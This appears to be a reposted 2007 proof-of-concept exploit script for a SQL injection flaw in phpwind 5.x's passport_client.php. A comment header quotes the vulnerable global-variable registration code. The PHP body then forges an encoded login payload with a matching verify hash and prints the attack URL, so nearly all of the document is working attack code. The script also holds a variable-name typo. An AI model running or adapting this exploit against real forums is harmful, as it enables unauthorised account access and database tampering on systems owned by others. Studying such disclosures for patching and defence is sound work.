phpwind5.x passport_client.php UPDATE SQL Injection POC

by Superhei
Date: 2007-04-08
http://www.ph4nt0m.org
<? ///////////////////////////////////////////////////// ///phpwind5.x passport_client.php UPDATE sql inj POC ///By [email protected] ///thx loulou /////////////////////////////////////////////// //[fix]:http://www.phpwind.net/read-htm-tid-392683.html //CODE IN require\defend.php[line 8-15] //foreach($_GET as $_key=>$_value){ // !ereg("^\_",$_key) && !isset($$_key) && $$_key=$_GET[$_key]; //} //$passport_ifopen = $passport_type = $passport_key = ''; //<--------here!!!! //require_once(D_P.'data/bbscache/config.php'); //if($db_forcecharset && !defined('W_P')){ // @header("Content-Type: text/html; charset=$db_charset"); //} //////////////////////////////////////////////////// $passwod='123456789'; $passport_key='6f0xuRI8Cd8iga'; $forward=" http://localhost/PHPWind5.0.1/upload/index.php"; $userdb="time=99999999999999999&username=heige111&password=".md5($password); $userdb= StrCode($userdb,'ENCODE'); $verify=md5($action.$userdb.$forward.$passport_key); print "passport_client.php?passport_type=client&passport_ifopen=1&action=login&forward=".urlencode($forward)."&passport_key=".$passport_key."&verify=".$verify."&userdb=".urlencode($userdb);

function StrCode($string,$action='ENCODE'){ $GLOBALS['db_hash']='6f0xuRI8Cd8iga'; $key = substr(md5($_SERVER["HTTP_USER_AGENT"].$GLOBALS['db_hash']),8,18); //$key = '6f0xuRI8Cd8iga'; [当时误把$key当作了$passport_key] $string = $action == 'ENCODE' ? $string : base64_decode($string); $len = strlen($key); $code = ''; for($i=0; $i<strlen($string); $i++){ $k = $i % $len; $code .= $string[$i] ^ $key[$k]; } $code = $action == 'DECODE' ? $code : base64_encode($code); return $code; }

鬼仔's Blog